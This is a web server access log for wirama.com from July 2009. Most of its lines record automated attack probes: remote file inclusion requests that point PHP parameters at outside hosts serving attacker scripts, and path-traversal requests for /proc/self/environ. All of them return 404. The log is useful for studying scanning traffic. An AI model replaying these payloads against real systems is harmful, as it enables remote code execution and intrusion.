61.106.21.35 - - [02/Jul/2009:06:47:05 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.fatemg.edu.br/portal/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.wirama.com"
61.106.21.35 - - [02/Jul/2009:06:47:06 -0700] "GET /logs/errors.php?error=http://www.fatemg.edu.br/portal/buggsbunny?? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.wirama.com"
61.106.21.35 - - [02/Jul/2009:06:47:06 -0700] "GET /errors.php?error=http://www.fatemg.edu.br/portal/buggsbunny?? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.wirama.com"
61.106.21.35 - - [02/Jul/2009:06:47:06 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.wirama.com"
61.106.21.35 - - [02/Jul/2009:06:47:07 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.wirama.com"
61.106.21.35 - - [02/Jul/2009:06:47:07 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.wirama.com"
61.106.21.35 - - [02/Jul/2009:06:47:08 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.wirama.com"
87.229.45.106 - - [02/Jul/2009:06:52:03 -0700] "GET /logs/access_090601.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.d-sport.ru//assets/cache/idv6.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
87.229.45.106 - - [02/Jul/2009:06:52:03 -0700] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.d-sport.ru//assets/cache/idv6.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
87.229.45.106 - - [02/Jul/2009:06:52:03 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.d-sport.ru//assets/cache/idv6.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
65.55.208.49 - - [02/Jul/2009:06:54:16 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.208.49 - - [02/Jul/2009:06:54:18 -0700] "GET /_private/?M=D HTTP/1.1" 200 675 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
87.229.45.106 - - [02/Jul/2009:07:04:21 -0700] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.d-sport.ru//assets/cache/idv6.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
87.229.45.106 - - [02/Jul/2009:07:04:21 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.d-sport.ru//assets/cache/idv6.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
209.51.141.77 - - [02/Jul/2009:07:06:29 -0700] "GET /kboard_v2/kboard/kboard.php?board=fashion_info&act=view&no=4//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
209.51.141.77 - - [02/Jul/2009:07:06:30 -0700] "GET /logs/access_090601.log%20%20/kboard_v2/kboard/kboard.php?board=fashion_info&act=view&no=4//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
209.51.141.77 - - [02/Jul/2009:07:06:30 -0700] "GET /logs/kboard_v2/kboard/kboard.php?board=fashion_info&act=view&no=4//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
209.51.141.77 - - [02/Jul/2009:07:07:05 -0700] "GET /logs/kboard_v2/kboard/kboard.php?board=fashion_info&act=view&no=4//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
209.51.141.77 - - [02/Jul/2009:07:07:06 -0700] "GET /logs/access_090601.log/kboard_v2/kboard/kboard.php?board=fashion_info&act=view&no=4//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
209.51.141.77 - - [02/Jul/2009:07:07:06 -0700] "GET /kboard_v2/kboard/kboard.php?board=fashion_info&act=view&no=4//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
209.51.141.77 - - [02/Jul/2009:07:07:34 -0700] "GET /logs/access.log%20%20/kboard_v2/kboard/kboard.php?board=fashion_info&act=view&no=4//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
209.51.141.77 - - [02/Jul/2009:07:08:15 -0700] "GET /logs/access.log/kboard_v2/kboard/kboard.php?board=fashion_info&act=view&no=4//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
87.229.45.106 - - [02/Jul/2009:07:10:37 -0700] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.d-sport.ru//assets/cache/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
87.229.45.106 - - [02/Jul/2009:07:10:37 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.d-sport.ru//assets/cache/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
87.229.45.106 - - [02/Jul/2009:07:10:37 -0700] "GET /logs/access_090601.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.d-sport.ru//assets/cache/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
209.51.141.77 - - [02/Jul/2009:07:10:53 -0700] "GET /logs/access_090601.log/kboard_v2/kboard/kboard.php?board=fashion_info&act=view&no=4//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
209.51.141.77 - - [02/Jul/2009:07:11:19 -0700] "GET /logs/access.log/kboard_v2/kboard/kboard.php?board=fashion_info&act=view&no=4//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
209.51.141.77 - - [02/Jul/2009:07:15:07 -0700] "GET /logs/access_090401.log/kboard_v2/kboard/kboard.php?board=fashion_info&act=view&no=4//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
209.51.141.77 - - [02/Jul/2009:07:15:07 -0700] "GET /kboard_v2/kboard/kboard.php?board=fashion_info&act=view&no=4//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
209.51.141.77 - - [02/Jul/2009:07:15:07 -0700] "GET /logs/kboard_v2/kboard/kboard.php?board=fashion_info&act=view&no=4//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
193.47.80.37 - - [02/Jul/2009:07:24:18 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "wirama.com"
193.47.80.37 - - [02/Jul/2009:07:24:19 -0700] "GET / HTTP/1.1" 200 916 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "wirama.com"
87.229.45.106 - - [02/Jul/2009:07:37:34 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.d-sport.ru//assets/cache/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
87.229.45.106 - - [02/Jul/2009:07:37:34 -0700] "GET /logs/access_090601.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.d-sport.ru//assets/cache/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
87.229.45.106 - - [02/Jul/2009:07:37:34 -0700] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.d-sport.ru//assets/cache/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
212.175.12.133 - - [02/Jul/2009:07:38:53 -0700] "GET /kboard_v2/kboard/kboard.php?board=fashion_info&act=view&no=4//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://aboutav.com//back/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.wirama.com"
212.175.12.133 - - [02/Jul/2009:07:38:53 -0700] "GET /logs/kboard_v2/kboard/kboard.php?board=fashion_info&act=view&no=4//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://aboutav.com//back/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.wirama.com"
209.160.43.226 - - [02/Jul/2009:07:44:27 -0700] "GET /logs/access_090330.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.fatemg.edu.br/portal/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.wirama.com"
209.160.43.226 - - [02/Jul/2009:07:44:27 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.fatemg.edu.br/portal/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.wirama.com"
209.160.43.226 - - [02/Jul/2009:07:44:27 -0700] "GET /logs/access_090330.log/errors.php?error=http://www.fatemg.edu.br/portal/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.wirama.com"
209.160.43.226 - - [02/Jul/2009:07:44:28 -0700] "GET /errors.php?error=http://www.fatemg.edu.br/portal/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.wirama.com"
209.160.43.226 - - [02/Jul/2009:07:44:28 -0700] "GET /logs/access_090330.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.wirama.com"
209.160.43.226 - - [02/Jul/2009:07:44:28 -0700] "GET /logs/access_090330.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.wirama.com"
209.160.43.226 - - [02/Jul/2009:07:44:28 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.wirama.com"
209.160.43.226 - - [02/Jul/2009:07:44:28 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.wirama.com"
209.160.43.226 - - [02/Jul/2009:07:44:34 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.fatemg.edu.br/portal/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.wirama.com"
209.160.43.226 - - [02/Jul/2009:07:44:34 -0700] "GET /logs/errors.php?error=http://www.fatemg.edu.br/portal/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.wirama.com"
209.160.43.226 - - [02/Jul/2009:07:44:35 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.wirama.com"
195.34.78.110 - - [02/Jul/2009:07:44:36 -0700] "GET /logs/access_090401.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
195.34.78.110 - - [02/Jul/2009:07:44:38 -0700] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
195.34.78.110 - - [02/Jul/2009:07:44:39 -0700] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
209.160.43.226 - - [02/Jul/2009:07:44:39 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.wirama.com"
212.175.12.133 - - [02/Jul/2009:07:45:58 -0700] "GET /logs/kboard_v2/kboard/kboard.php?board=fashion_info&act=view&no=4//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://aboutav.com//back/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.wirama.com"
212.175.12.133 - - [02/Jul/2009:07:45:58 -0700] "GET /kboard_v2/kboard/kboard.php?board=fashion_info&act=view&no=4//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://aboutav.com//back/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.wirama.com"
195.34.78.110 - - [02/Jul/2009:07:47:41 -0700] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
195.34.78.110 - - [02/Jul/2009:07:47:42 -0700] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
195.34.78.110 - - [02/Jul/2009:07:47:42 -0700] "GET /logs/access_090401.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
87.118.106.133 - - [02/Jul/2009:07:48:51 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.intakkabili.altervista.org/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
87.118.106.133 - - [02/Jul/2009:07:48:51 -0700] "GET /logs/access_090531.log%20%20//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.intakkabili.altervista.org/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
87.118.106.133 - - [02/Jul/2009:07:48:52 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.intakkabili.altervista.org/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
192.234.106.2 - - [02/Jul/2009:07:54:41 -0700] "GET /pr02.htm HTTP/1.1" 404 275 "http://www.rfidupdate.com/articles/index.php?id=1542" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.wirama.com"
192.234.106.2 - - [02/Jul/2009:07:54:56 -0700] "GET / HTTP/1.1" 200 916 "http://www.rfidupdate.com/articles/index.php?id=1542" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.wirama.com"
192.234.106.2 - - [02/Jul/2009:07:56:55 -0700] "GET / HTTP/1.1" 200 916 "http://www.rfidsolutionsonline.com/article.mvc/Passive-RFID-Reader-Wirama-Demonstrates-World-0001?VNETCOOKIE=NO" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.wirama.com"
65.55.208.60 - - [02/Jul/2009:07:57:04 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.208.60 - - [02/Jul/2009:07:57:04 -0700] "GET /?D=D HTTP/1.1" 200 916 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
192.234.106.2 - - [02/Jul/2009:07:58:06 -0700] "GET / HTTP/1.1" 200 916 "http://www.rfidupdate.com/articles/index.php?id=1542" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.wirama.com"
192.234.106.2 - - [02/Jul/2009:07:58:35 -0700] "GET / HTTP/1.1" 200 916 "http://www.rfidupdate.com/articles/index.php?id=1542" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.wirama.com"
87.118.106.133 - - [02/Jul/2009:08:00:20 -0700] "GET /multithumb/multithumb?mosConfig_absolute_path=http://www.intakkabili.altervista.org/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
87.118.106.133 - - [02/Jul/2009:08:00:20 -0700] "GET /logs//multithumb/multithumb?mosConfig_absolute_path=http://www.intakkabili.altervista.org/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
87.118.106.133 - - [02/Jul/2009:08:00:20 -0700] "GET /logs/access_090330.log//multithumb/multithumb?mosConfig_absolute_path=http://www.intakkabili.altervista.org/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
192.234.106.2 - - [02/Jul/2009:08:00:22 -0700] "GET / HTTP/1.1" 200 916 "http://www.rfidupdate.com/articles/index.php?id=1542" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.wirama.com"
87.118.106.133 - - [02/Jul/2009:08:01:08 -0700] "GET /logs/access_090331.log//multithumb/multithumb?mosConfig_absolute_path=http://www.intakkabili.altervista.org/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
87.118.106.133 - - [02/Jul/2009:08:01:15 -0700] "GET /logs/access_090330.log//multithumb/multithumb?mosConfig_absolute_path=http://www.intakkabili.altervista.org/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
87.118.106.133 - - [02/Jul/2009:08:01:15 -0700] "GET /multithumb/multithumb?mosConfig_absolute_path=http://www.intakkabili.altervista.org/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
87.118.106.133 - - [02/Jul/2009:08:01:15 -0700] "GET /logs//multithumb/multithumb?mosConfig_absolute_path=http://www.intakkabili.altervista.org/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
87.118.106.133 - - [02/Jul/2009:08:01:40 -0700] "GET /logs/access_090331.log//multithumb/multithumb?mosConfig_absolute_path=http://www.intakkabili.altervista.org/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
87.118.106.133 - - [02/Jul/2009:08:02:04 -0700] "GET /multithumb/multithumb?mosConfig_absolute_path=http://www.intakkabili.altervista.org/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
87.118.106.133 - - [02/Jul/2009:08:02:04 -0700] "GET /logs//multithumb/multithumb?mosConfig_absolute_path=http://www.intakkabili.altervista.org/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
87.118.106.133 - - [02/Jul/2009:08:02:04 -0700] "GET /logs/access_090330.log//multithumb/multithumb?mosConfig_absolute_path=http://www.intakkabili.altervista.org/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
87.118.106.133 - - [02/Jul/2009:08:02:19 -0700] "GET /multithumb/multithumb?mosConfig_absolute_path=http://www.intakkabili.altervista.org/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
87.118.106.133 - - [02/Jul/2009:08:02:19 -0700] "GET /logs/access_090330.log//multithumb/multithumb?mosConfig_absolute_path=http://www.intakkabili.altervista.org/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
87.118.106.133 - - [02/Jul/2009:08:02:20 -0700] "GET /logs//multithumb/multithumb?mosConfig_absolute_path=http://www.intakkabili.altervista.org/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
87.118.106.133 - - [02/Jul/2009:08:02:52 -0700] "GET /logs/access_090331.log//multithumb/multithumb?mosConfig_absolute_path=http://www.intakkabili.altervista.org/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
209.51.133.202 - - [02/Jul/2009:08:12:37 -0700] "GET /logs/access_090330.log//body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
209.51.133.202 - - [02/Jul/2009:08:12:37 -0700] "GET /logs//body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
209.51.133.202 - - [02/Jul/2009:08:12:37 -0700] "GET /body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
69.65.10.238 - - [02/Jul/2009:08:17:42 -0700] "GET /mygallerybrowser.php?myPath=http://140.127.22.184/htaccess?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
69.65.10.238 - - [02/Jul/2009:08:17:42 -0700] "GET /logs/access_090601.log%20%20//mygallerybrowser.php?myPath=http://140.127.22.184/htaccess?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
69.65.10.238 - - [02/Jul/2009:08:17:42 -0700] "GET /logs//mygallerybrowser.php?myPath=http://140.127.22.184/htaccess?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
212.175.12.133 - - [02/Jul/2009:08:21:51 -0700] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
212.175.12.133 - - [02/Jul/2009:08:21:51 -0700] "GET /logs/access_090330.log/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
212.175.12.133 - - [02/Jul/2009:08:21:52 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
69.65.10.238 - - [02/Jul/2009:08:22:00 -0700] "GET /logs/access_090601.log//mygallerybrowser.php?myPath=http://140.127.22.184/htaccess?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
69.65.10.238 - - [02/Jul/2009:08:22:00 -0700] "GET /logs//mygallerybrowser.php?myPath=http://140.127.22.184/htaccess?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
69.65.10.238 - - [02/Jul/2009:08:22:00 -0700] "GET /mygallerybrowser.php?myPath=http://140.127.22.184/htaccess?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
201.232.54.48 - - [02/Jul/2009:08:24:15 -0700] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
201.232.54.48 - - [02/Jul/2009:08:24:18 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
